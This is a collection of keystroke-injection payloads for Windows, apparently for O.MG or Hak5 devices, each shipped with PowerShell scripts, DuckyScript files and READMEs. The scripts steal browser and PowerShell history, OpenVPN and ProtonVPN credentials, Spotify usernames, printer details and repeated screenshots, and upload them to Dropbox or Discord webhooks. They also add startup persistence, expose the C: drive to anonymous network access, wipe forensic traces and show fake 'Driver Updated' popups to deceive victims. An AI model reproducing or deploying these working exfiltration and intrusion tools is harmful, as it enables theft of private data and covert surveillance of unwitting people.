================================================ FILE: OMG/payloads/History-Pig/HP.ps1 ================================================ #History-Pig # See if file is a thing Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) { try { Write-Host "The Chrome History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome History to Temp Directory to get sent to Dropbox else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history" Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1" } # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) { try { Write-Host "The Edge History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Edge History to Temp Directory to get sent to Dropbox else { $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history" Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" DropBox-Upload -f "$env:tmp/$F2" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: OMG/payloads/History-Pig/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# History-Pig A payload to exfiltrate the history of the 2 most popular browsers ## Description This payload will enumerate through the browser directories, looking for the file that stores the history These files will be saved to the temp directory Finally dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: OMG/payloads/History-Pig/payload.txt ================================================ REM Title: History-Pig REM Author: atomiczsec REM Description: This payload is meant to exfiltrate browsers history to a dropbox REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/OVPN-Hog/o.ps1 ================================================ function OVPN-Hog { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))) { Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json) } if (-not ([string]::IsNullOrEmpty($file))) { curl.exe -F "file1=@$file" $hookurl } } $Drive = "C:" $Files = Get-ChildItem -Path $Drive -Filter "*.ovpn" -File -Recurse if ($Files) { $types = @{ "*.ovpn" = "OpenVPN" } foreach ($type in $types.Keys) { $filteredFiles = $Files | Where-Object { $_.Name -like $type } if ($filteredFiles) { $zipFile = Join-Path -Path $env:TEMP -ChildPath "$($types[$type]).zip" $filteredFiles | Compress-Archive -DestinationPath $zipFile OVPN-Hog -file $zipFile -text "Uploading $($types[$type]) files" } } } ================================================ FILE: OMG/payloads/OVPN-Hog/payload.txt ================================================ REM Title: Doc-Hog REM Author: atomiczsec REM Description: This payload will enumerate through the files looking for ".ovpn" files. Then create ZIPs with them, then send to a discord webhook. DEFINE URL http://new-url.com/powershell.ps1 REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/OVPN-Hog/readme.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# OVPN-Hog A PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn). ## Description This script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook. ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact
Link

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: OMG/payloads/Powershell-History/PH.ps1 ================================================ #Powershell-History # See if file is a thing Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf)) { try { Write-Host "The Powershell History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Powershell History to Temp Directory to get sent to Dropbox else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt" Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination "$env:tmp/$F1" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: OMG/payloads/Powershell-History/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Powershell-History A payload to exfiltrate the history of the powershell console ## Description This payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console These files will be saved to the temp directory Finally dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: OMG/payloads/Powershell-History/payload.txt ================================================ REM Title: Powershell-History REM Author: atomiczsec REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/Printer-Recon/PR.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } function Clean-Exfil { # empty temp folder rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue # delete run box history reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f # Delete powershell history Remove-Item (Get-PSreadlineOption).HistorySavePath # Empty recycle bin Clear-RecycleBin -Force -ErrorAction SilentlyContinue } $F1 = "$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt" Get-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1 DropBox-Upload -f $F1 Clean-Exfil ================================================ FILE: OMG/payloads/Printer-Recon/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Printer-Recon ## Description This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: OMG/payloads/Printer-Recon/payload.txt ================================================ REM Title: Printer-Recon REM Author: atomiczsec REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/Priv-Paths/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Printer-Recon ## Description A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook. ## Getting Started ### Dependencies * Discord Webhook or other service that uses webhooks * Windows 10

(back to top)

### Executing program * Plug in your device * Command will be entered in the command prompt to search for unqouted service paths so you can later exploit them for priv esc ``` wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: OMG/payloads/Priv-Paths/payload.txt ================================================ REM Title: Priv-Paths REM Author: atomiczsec REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook. REM Target: Windows 10 DELAY 3000 GUI r DELAY 1000 STRING cmd ENTER DELAY 500 STRING cd %HOMEPATH% ENTER DELAY 1000 STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt ENTER DELAY 1000 STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" YOUR-DISCORD-WEBHOOK ENTER DELAY 200 STRING del p.txt ENTER DELAY 100 STRING exit ENTER ================================================ FILE: OMG/payloads/Proton-Hog/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Proton-Hog A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information. ## Description This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file Then dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: OMG/payloads/Proton-Hog/payload.txt ================================================ REM Title: Proton-Hog REM Author: atomiczsec REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/Proton-Hog/s.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } # Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) { try { Write-Host "The VPN folder has not been found. " } catch { throw $_.Exception.Message } } else { $protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN" cd $protonVpnPath Get-ChildItem | Where-Object {$_.name -Match "ProtonVPN.exe"} | cd Get-ChildItem | cd # Upload user.config to dropbox DropBox-Upload -f "user.config" } ================================================ FILE: OMG/payloads/Pwn-Drive/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Pwn-Drive A payload to share the victims "C:" drive to the network. ## Description This payload will share the entire victims "C:" drive to the entire network for further exploitation. ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: OMG/payloads/Pwn-Drive/c.ps1 ================================================ #Pwn-Drive #Enable Network Discovery netsh advfirewall firewall set rule group=”network discovery” new enable=yes #Enable File and Print netsh firewall set service type=fileandprint mode=enable profile=all #Setting Registry Values for allowing access to drive without credentials Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force #Sharing the Drive New-SmbShare -Name "Windows Update" -Path "C:\" ================================================ FILE: OMG/payloads/Pwn-Drive/payload.txt ================================================ REM Title: Pwn-Drive REM Author: atomiczsec REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/RanFunWare/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# RanFunWare A payload to prank your friends into thinking their computer got hit with ransomware. ## Description This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable) ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: OMG/payloads/RanFunWare/payload.txt ================================================ REM Title: RanFunWare REM Author: atomiczsec REM Description: This payload will prank your target into thinking their machine got hit with ransomware. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/RanFunWare/r.ps1 ================================================ #Hides Desktop Icons $Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1 Get-Process "explorer"| Stop-Process #Changes Background #URL For the Image of your choice (Wanna Cry Ransomware Background) $url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg" Invoke-WebRequest $url -OutFile C:\temp\test.jpg $setwallpapersrc = @" using System.Runtime.InteropServices; public class Wallpaper { public const int SetDesktopWallpaper = 20; public const int UpdateIniFile = 0x01; public const int SendWinIniChange = 0x02; [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); public static void SetWallpaper(string path) { SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange); } } "@ Add-Type -TypeDefinition $setwallpapersrc [Wallpaper]::SetWallpaper("C:\temp\test.jpg") #Pop Up Message function MsgBox { [CmdletBinding()] param ( [Parameter (Mandatory = $True)] [Alias("m")] [string]$message, [Parameter (Mandatory = $False)] [Alias("t")] [string]$title, [Parameter (Mandatory = $False)] [Alias("b")] [ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] [string]$button, [Parameter (Mandatory = $False)] [Alias("i")] [ValidateSet('None','Hand','Question','Warning','Asterisk')] [string]$image ) Add-Type -AssemblyName PresentationCore,PresentationFramework if (!$title) {$title = " "} if (!$button) {$button = "OK"} if (!$image) {$image = "None"} [System.Windows.MessageBox]::Show($message,$title,$button,$image) } MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning ================================================ FILE: OMG/payloads/Screen-Shock/I.bat ================================================ @echo off powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" pause ================================================ FILE: OMG/payloads/Screen-Shock/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Screen-Shock This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) ## Description This payload uses iwr to download 2 files * I.bat * c.ps1 **I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup **c.ps1** will sit in AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds Then the contents will then be sent to the DropBox for viewing pleasure ## Getting Started ### Dependencies * Pastebin or other file sharing service, Dropbox * Windows 10 * [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload

(back to top)

### Executing program * Plug in your device * Device will download both files and place them in proper directories to then run the script ``` powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: OMG/payloads/Screen-Shock/c.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } while(1){ Add-Type -AssemblyName System.Windows.Forms,System.Drawing $screens = [Windows.Forms.Screen]::AllScreens $top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum $left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum $width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum $bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height) $bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height) $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png") $graphics.Dispose() $bmp.Dispose() start-sleep -Seconds 15 "$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload } ================================================ FILE: OMG/payloads/Screen-Shock/payload.txt ================================================ REM Title: Screen-Shock REM Author: atomiczsec REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) REM Target: Windows 10 DELAY 2000 GUI DELAY STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ENTER REM Remember to replace the link with your pastebin shared link for the intended files to download REM Also remember to put in your discord webhook in c.ps1 REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH ================================================ FILE: OMG/payloads/Screen-Shock/placeholder ================================================ ================================================ FILE: OMG/payloads/Spotify-Spy/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Spotify-Spy This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so. ## Description Have you ever been too afraid to ask your co-worker for what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their spotify username for you so you dont have to socially interact with anyone! ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: OMG/payloads/Spotify-Spy/SS.ps1 ================================================ #Spotify-Spy # See if file is a thing Test-Path -Path "$env:APPDATA\Spotify\Users" #Create varible for file name $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt" # Gets the name of the spotify user cd "$env:APPDATA\Spotify\Users" Get-ChildItem > $F1 # Copy Spotify User to Temp Directory to get sent to Dropbox Copy-Item "$F1" -Destination "$env:tmp/$F1" function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" rm $F1 $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: OMG/payloads/Spotify-Spy/payload.txt ================================================ REM Title: Spotify-Spy REM Author: atomiczsec REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to 